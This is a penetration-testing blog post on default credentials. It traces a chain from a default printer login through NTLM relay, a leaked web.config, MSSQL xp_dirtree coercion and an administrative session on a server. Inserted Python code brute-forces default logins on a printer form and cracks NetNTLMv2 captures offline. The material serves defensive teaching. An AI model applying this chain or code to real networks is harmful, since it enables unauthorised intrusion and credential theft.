SpiderLabs Blog

Why It’s Important to Change Default Credentials

Security best-practice guidelines always call for changing default passwords: any password left at the factory preset is low-hanging fruit, waiting to be abused by an attacker to gain unauthorised access.

Frameworks such as Cyber Essentials, PCI DSS and the UK Government IT Health Check (ITHC) include this as a test requirement during an audit. The scenario below shows why changing default passwords is part of best practice: left unchanged, a default credential can be the first step toward a far more severe compromise. According to the 2022 Verizon Data Breach Investigations Report, 53% of data breaches occur due to default or shared credentials.

How Default Passwords Can be Abused

Below is a typical printer login page. In most cases the device ships with a default username and password that are publicly documented. Tools such as creds (a default-credential lookup that takes a product or device name) make finding them trivial.

 

Figure 1: Default Credentials

Figure 2: Printer Login Page

 

This is an incredibly easy task, and one that immediately opens the company or individual up to attack.
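As an added example (not Trustwave's tooling and not code from the post), the check below tries a short, constructed list of vendor defaults against a printer's web login form. So that it runs offline it starts a simulated printer admin page in-process that accepts admin/1234; the /login path, the username and password field names and the "Logout" marker that signals a successful login are assumptions about the target, so adjust them to the real device's form.

```python
"""Default-credential check against a printer's web login form (runs offline against a fake printer)."""
import threading
import time
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed list of the kind of vendor defaults a tool such as creds would return.
# Keep it short: embedded admin interfaces often lock out after a few failures.
DEFAULT_CREDS = [
    ("admin", "admin"),
    ("admin", ""),
    ("admin", "1234"),
    ("root", "root"),
]

# Assumptions about the target's form; change these to match the real device.
LOGIN_PATH = "/login"
USER_FIELD, PASS_FIELD = "username", "password"
SUCCESS_MARKER = b"Logout"  # text that only the post-login page shows


class FakePrinter(BaseHTTPRequestHandler):
    """Simulated printer admin page: accepts admin/1234 and shows a Logout link once logged in."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        creds = (form.get(USER_FIELD, [""])[0], form.get(PASS_FIELD, [""])[0])
        if creds == ("admin", "1234"):
            body = b"<html><body><a href='/logout'>Logout</a> Configuration</body></html>"
        else:
            body = b"<html><body>Invalid user name or password</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo output quiet


def start_fake_printer():
    """Start the simulated printer on a free localhost port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), FakePrinter)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


def try_login(base_url: str, username: str, password: str, timeout: float = 5.0) -> bool:
    """POST one pair to the login form; True when the post-login page comes back."""
    data = urllib.parse.urlencode({USER_FIELD: username, PASS_FIELD: password}).encode()
    req = urllib.request.Request(base_url + LOGIN_PATH, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return SUCCESS_MARKER in resp.read()
    except urllib.error.HTTPError:
        return False  # devices that answer a bad login with 401/403 land here


def find_default_credentials(base_url: str, candidates=DEFAULT_CREDS, delay: float = 0.0):
    """Return the first working (username, password) pair, or None if no default works."""
    for username, password in candidates:
        if try_login(base_url, username, password):
            return (username, password)
        time.sleep(delay)  # throttle on a real device; a lockout is a denial of service
    return None


if __name__ == "__main__":
    server, url = start_fake_printer()
    try:
        print("working default credentials:", find_default_credentials(url))
    finally:
        server.shutdown()
```

Against a real device, keep the candidate list short and set a delay: embedded web interfaces frequently lock the admin account after a few failed attempts, and a locked printer is an outage, not a finding.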

Once authenticated, an attacker has the configuration pages as administrator and can carry out malicious tasks from there. Most current printers have a scan-to-folder or print-to-folder feature; to use it, an account must be set up with permission to write to a folder on a file or print server, and that account's credentials are stored on the printer.

Trustwave SpiderLabs has observed that the accounts created for this purpose are often domain accounts, sometimes with higher privileges than the restricted account that would be sufficient to write to the folder.

In some cases those stored credentials are embedded in the configuration page itself and can be revealed simply with the browser's "Inspect element" option. In other cases they are kept in the device's configuration file and are encrypted. One such printer is shown below:

 

Figure 3: SMB Configuration on a Printer/Scanner

 

In this case the printer does not expose any stored authentication details on the page, but the "Scan destination" option can be edited. All that is needed is to change the scan destination to the IP address of our machine and run ntlmrelayx.py from Impacket, which listens with an SMB server, captures the NTLM authentication the printer sends and relays it to a target; with the "-socks" flag the relayed sessions are held open on a SOCKS proxy so other tools can use them via proxychains. Once the scan destination has been changed, the printer's "check authentication" or "test connection" option triggers the connection, and the printer authenticates to our host with the stored scan-to-folder account.

 

Figure 4: Hash captured from the Printer.

 

The screenshot above shows that the captured authentication was relayed successfully to the print server. In this case the account did not have administrative privileges on that system; a domain user is still enough, however, to scan the network for accessible file shares that may hold sensitive information. Depending on the network the list of targets can be much larger: the "-tf" flag in ntlmrelayx takes a file of targets, which should be limited to systems that do not require SMB signing, since a relayed authentication is rejected wherever signing is enforced. During the enumeration phase a file server was found on which the user could read a folder containing a "web.config" file.

 

Figure 5: Relaying Hashes with Proxychains

 

The "web.config" file contained the server details and credentials for an MSSQL server, so it was possible to connect to it. Once connected, calling "xp_dirtree" with a UNC path pointing at the rogue SMB server forces the SQL Server service account to authenticate to our host (xp_dirtree is callable by any login by default, so no elevated SQL privileges are needed); with the MSSQL host itself configured as the target in ntlmrelayx, that authentication is captured and relayed. As before, the relay only succeeds where the target does not require SMB signing.

 

Figure 6: Browsing SMB share via MSSQL.

 

Once the command was issued, the hashes from the MSSQL server were captured, as shown below:

 

Figure 7: Hashes captured from the MSSQL Server

 

The captured authentication shows that the MSSQL service is running as the "SVC_TESTMSSQL" service account. Service accounts of this kind are sometimes local administrators on the systems they run on, and that is the case here: the AdminStatus column in ntlmrelayx's SOCKS session list is "TRUE", meaning the relayed session has administrative access to the target, so through the proxy it is possible to dump credential material (for example with secretsdump.py) or obtain a shell (for example with psexec.py or smbexec.py), as shown below:

 

Figure 8: Administrative Access on Server

 
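The "hashes" captured in Figures 4 and 7 are NetNTLMv2 responses, not the account's NT hash: each is an HMAC over the server's challenge and a client blob, keyed with a value derived from the password. ntlmrelayx relays them live, but they can also be attacked offline, which is why the strength of the scan-to-folder or service account password matters. The block below, an added example and not code from the post or from Impacket, reproduces the MS-NLMP NTLMv2 computation in pure Python for a constructed account (SVC_TESTMSSQL in a made-up CORP domain with the password Printer123), writes the capture in the hashcat mode 5600 line format that ntlmrelayx and Responder log, and then recovers the password from that line with a small constructed wordlist. The challenge bytes, timestamp, AV pairs and passwords are all constructed for the demo.

```python
"""NetNTLMv2 capture line: build one for a constructed account and recover the password offline."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is absent on many OpenSSL 3 builds."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK
    # Padding: 0x80, zeros up to 56 mod 64, then the bit length as a little-endian u64.
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                j = (-i) % 4  # register being updated cycles a, d, c, b
                val = s[j] + fn(s[(j + 1) % 4], s[(j + 2) % 4], s[(j + 3) % 4]) + x[k] + const
                s[j] = rotl(val & MASK, shifts[i % 4])
        state = [(a + b) & MASK for a, b in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 of the UTF-16LE password. NTLMv2 is keyed from this; it is not what gets captured."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash over UPPER(user)+domain."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof(key: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 over server challenge + blob; the first 16 bytes of NtChallengeResponse."""
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def make_blob(timestamp: int, client_challenge: bytes, domain: str) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE: response type, timestamp, client nonce, AV pairs (constructed minimal set)."""
    target = domain.encode("utf-16-le")
    av_pairs = struct.pack("<HH", 2, len(target)) + target + struct.pack("<HH", 0, 0)  # MsvAvNbDomainName, MsvAvEOL
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)


def capture_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """The line ntlmrelayx/Responder log and hashcat -m 5600 consumes: USER::DOMAIN:challenge:NTProofStr:blob."""
    proof = nt_proof(ntlmv2_key(password, user, domain), server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def check_candidate(line: str, candidate: str) -> bool:
    """Recompute NTProofStr for one guess; everything else needed is already in the capture line."""
    user, _, domain, challenge, proof, blob = line.split(":")
    calc = nt_proof(ntlmv2_key(candidate, user, domain), bytes.fromhex(challenge), bytes.fromhex(blob))
    return hmac.compare_digest(calc, bytes.fromhex(proof))


def crack_net_ntlmv2(line: str, wordlist):
    """Offline guessing: unlike relay it needs no live target and no SMB signing gap, only a weak password."""
    for candidate in wordlist:
        if check_candidate(line, candidate):
            return candidate
    return None


# Constructed exchange (assumed values): a service account with a guessable password.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = make_blob(132_000_000_000_000_000, bytes.fromhex("aabbccddeeff0011"), "CORP")
CAPTURED = capture_line("SVC_TESTMSSQL", "CORP", "Printer123", SERVER_CHALLENGE, BLOB)

if __name__ == "__main__":
    print(CAPTURED)
    print("recovered:", crack_net_ntlmv2(CAPTURED, ["Winter2023", "Welcome1", "Printer123"]))
```

Two details to keep right when working with captures: the user name is upper-cased before the NTOWFv2 HMAC but the domain is not, and the value after the server challenge in the capture line is only the first 16 bytes (NTProofStr) of the NtChallengeResponse; the remainder is the blob that follows it. A relay needs a target that does not enforce SMB signing, whereas this offline route needs nothing but a weak password, which is the reason the account a printer stores must be both least-privilege and strongly protected.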

Conclusion

Default passwords on applications and devices lead to far more severe issues when combined with known misconfigurations such as SMB signing being disabled. While most modern devices and applications require users to set a password on first installation, the organization's password policy must adhere to best practice, and the accounts a device stores for features such as scan-to-folder should be restricted, least-privilege accounts rather than privileged domain users. For legacy devices and applications, review the default accounts on these systems and set a complex password as per security best-practice guidelines. Requiring SMB signing on servers and workstations removes the relay path shown above even where a credential does leak.
